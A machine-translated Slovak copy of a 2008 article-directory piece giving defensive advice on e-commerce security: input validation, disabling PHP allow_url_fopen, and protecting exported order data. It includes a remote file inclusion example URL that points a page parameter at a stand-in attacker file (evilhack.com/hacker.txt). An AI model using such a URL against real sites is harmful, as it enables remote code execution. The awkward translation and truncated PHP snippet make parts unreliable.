The following content has been automatically translated by close 
E-Commerce Security - Pripojenie bezpečnostné diery | Elektronický obchod článok
Článok Guľová Logo

E-Commerce Security - Pripojenie bezpečnostné diery

By Author Expert: Paul Roberts | Článok Abstract
Počet slov: 520 slov | Views: 145 view (s)
Bezpečnosť v e-commerce internetových stránkach musia byť jedným z najdôležitejších aspektov pri rozvoji e-commerce webovej stránky alebo softvér. Developer musí byť vedomí všetkých bezpečnostných otázok pri návrhu webu. S e-commerce čoraz bežnejšie v týchto dňoch, počet útokov na zabezpečenie, je určite rastie. Paranoja je zdravá vec, pre e-commerce site vývojárov, musíme držať krok k bráne s bezpečnostnými problémami, a aby naše uši a oči otvorené. Hoci tieto medzery sú závažné, ak sú prítomné tieto medzery sú ľahko opraviť.

Nižšie sú niektoré bezpečnostné aspekty, ktoré majú byť zahrnuté pri vývoji webu. Tento článok sa nevzťahuje na e-krádeže v obchodoch, prosím, pozri môj samostatný článok o tomto.

Užívateľský vstup - každý vstup, či už so zadaním množstva, vyhľadávanie produktov, zadaním názvu, atď, musí byť overená pre podozrivé osoby. Ak to uskutočniť, je možné zadať "?>", uzatváracie koncovej značky PHP a spustiť nejaký kód PHP.

Je oveľa bezpečnejšie povoliť čísiel a znakov az (vrátane miest) a 0-9 a nič iného, ako vytvoriť zoznam všetkých znakov, ktoré by nemali byť. Validačný skript musí prechádzať každý znak jeden po druhom. To je potrebné dosiahnuť s použitím pri validáciu na strane servera, nie Javascript. Použitie na strane servera overovanie vstupu je potrebné, aby sa nežiaduce znaky

Existuje ďalší zásadný pri vykonávaní PHP kódu. Pri použití PHP je nastavenie tzv allow_url_fopen, ktorá umožňuje otváranie súborov z PHP skriptu. Toto nastavenie by mali byť vypnuté, nie je absolútne nevyhnutné.

Len si predstavte, máte PHP skripty pre pevné hlavičky a päty, a prístup k vašej webovej stránky, zadajte príkaz v http://www.mysite.com/index.php?page=page2. Stačí sa používateľ so zlými úmyslami spustit skript zmenou týchto parametrov príkazom "http:// www.mysite.com/index.php?page=http://www.evilhack.com/hacker.txt" s nejaký PHP kód v súbore "hacker.txt". Dalo by sa niečo stalo, PHP súbory čítať, mazať, ukradol dôležité informácie.

Ak si nie ste istí, či je toto nastavenie zapnúť alebo vypnúť, skopírujte prosím nasledujúci PHP kód do textového súboru a nahrať ju na svoj webový server:

phpinfo ();
?>

Prejdete Ak váš scenár na svoj webový server, mali by ste naraziť na nastavenie allow_url_fopen v konfigurácii.

Používateľ počítača, môže za normálnych okolností, ktoré nemožno zistiť hodnotu tohto nastavenia.

Buďte opatrní vyvážaných dáta ako príkazy, výrobky vo formáte CSV súbory a mySQL. Ak je táto dáta sa vyváža zo skript a je vedený na webovom serveri pod spoločnou tj názov súboru. http://www.mysite.com/admin/output_tables.csv. To je len naozaj problém, keď vyvážané dáta uložené v súbore v adresári, ktorý je verejne prístupný. K dispozícii sú dva spôsoby, ako zabrániť tejto bezpečnostné riziko - Prvý výstupný súbor má za sebou adresár chránený heslom, za druhé sa dáta nachádzajú vnútri formulára HTML textarea element na skript. Majiteľ obchodu potom skopírovať informácie z textového súboru a vytvorte nový súbor na svojom počítači a vložte informácie nájdete tu.

Stačí hacker nájsť tento súbor kontrolou z e-commerce software demo internetovej stránky a pozrite sa rovnakým názvom na skutočnom mieste.
Paul Roberts

O autorovi / Autor Bio

Paul Roberts
Vedu softvér špecializujúca sa na e-Commerce, optimalizácia pre vyhľadávače, tlač a softvér na odhad tzv ROBO Design Solutions. Tiež som rozvíjať Nový Zéland e-commerce riešení a softvéru pod názvom ROBO Design.

Article Source: http://www.sk.articlesphere.com/Article/E-Commerce-Security---Plugging-the-Security-Holes/145459

Article Submitted: 2008-06-05 | This Article has been viewed 145 times.

Rate Article

Related Videos

How to Strengthen Network Security with Cisco Network Manager
Understanding your Home Network Router #5 - Secure Your Network with WPA2
Learn About Secure Computing
Ako na Keep Your Computer Bezpečná
Ako Skontrolujte nastavenia zabezpečenia v systéme Windows Vista

Viac "Elektronický obchod" Súvisiace články

Nižšie uvedené sú viac článkov, súvisiace s vyššie uvedeným článkom z "Elektronický obchod" článok kategórie.

Záujemcovia v uvedenom článku "E-Commerce Security - Pripojenie bezpečnostné diery" sú tiež záujem na súvisiace články uvedené nižšie:

Spustenie e-commerce podnikanie nie je len o udržanie svojej webovej stránky v prevádzke. Zákazníci spoliehajú na vašu schopnosť slúžiť im prostredníctvom telefónu, faxu, e-mail, alebo inými prostriedkami, a to si vyžaduje, aby všetky svoje systémy, ktoré budú pracovať, aby mohla plniť požiadavky zákazníkov.
Len pár dní zpátky som mal rozhovor s mojím priateľom. Bol oslavuje svoje 1. narodeniny dieťaťa a musel bežať medzi svoje rodné v Kerala a Chennai, jeho pracovné miesto. On a jeho lepšia polovička cestoval medzi týmito miestami aspoň 4 krát za posledný mesiac.
Ak ste robila e-commerce pre akékoľvek množstvo času, mali by ste vedieť, že existuje viac ako skutočné scamers poskytovateľov veľkoobchodných služieb dropship adresára. Vo svete e-business, Salehoo svetových značiek sú obaja seriózne poskytovatelia služieb, ktoré získali popularitu v posledných niekoľkých rokoch.
Ak ste niekedy boli on-line predajca, pravdepodobne ste už počuli o Salehoo alebo dokonca použiť aj vo svoj prospech. Ak ste práve začínate s vaším podnikaním, tie by mohli byť zamenené so zmiešaným Salehoo nám tam vonku. Teraz, poďme sa pozrieť na to, čo Salehoo je naozaj všade a služieb, ktoré ponúkajú, ktorú mnohí majú tendenciu prehliadať.
Koľko ľudí to vieš, že si kúpil niečo, čo on-line? Ak váš like me docela málo, to je dôvod, prečo elektronického obchodovania, je na svete nový on-line nákupné centrum. Ale kto prevádzkuje tieto on-line maloobchodných predajní? Ľudia ako vy a ja, to je dôvod, prečo toto podnikanie je na vzostupe a bude naďalej prekvitať a teraz i do budúcnosti.
Ak ste veľkým fanúšikom najmodernejších elektronických výrobkov, možno vás bude lákať myšlienka prevádzkovať vlastnú elektroniku on-line. Nie je to tak ťažké, ako začať, keď budete mať plne využívať práva pokles lodné elektroniky služby a existuje spousta na ktorých si môžete vybrať.
Už ste niekedy ísť do miestnej samoobsluhe, a klásť otázku, čo by to bolo, keď ho vlastnili? Chcete byť dobrým vlastníkom, budú ľudí, ako ste vy? No tento článok vám ukáže, výhody vlastniť svoj vlastný on-line obchode, alebo bežne známy ako e-commerce, ktoré sa líšia od skutočného miestnej samoobsluhe.
Článok Directory Home Všetky kategórie Internet a e-business Elektronický obchod

Nemôžete nájsť, čo hľadáte? Skúste Google Search!
Copyright © 2005 -- Larry Lim, Singapur - Článok vyhľadávače Directory na ArticleSphere.com ™
All Rights Reserved Worldwide. Všetky ochranné známky a servisné sú majetkom príslušných vlastníkov.

Afrikánčina Albánsky Arabský Bieloruský Bulharský Katalánsky Čínština (zjednodušená) Čínština (tradičná) Chorvátsky Čeština Dánsky Nemecký Anglický Estónsky Filipínsky Fínsky Francúzsky Galicijsky Grécky Hebrejský Hindština Maďarský Islandský Indonézsky Írsky Italiano Japonský Kórejský Lotyšský Litovský Macedónsky Malajsky Maltský Holandský Nórsky Perzský Poľský Portugalský Rumunský Ruský Srbský Slovenčina Slovinský Španielsky Swahilsky Švédsky Thajská Turecký Ukrajinský Vietnamský Waleština Jidišsky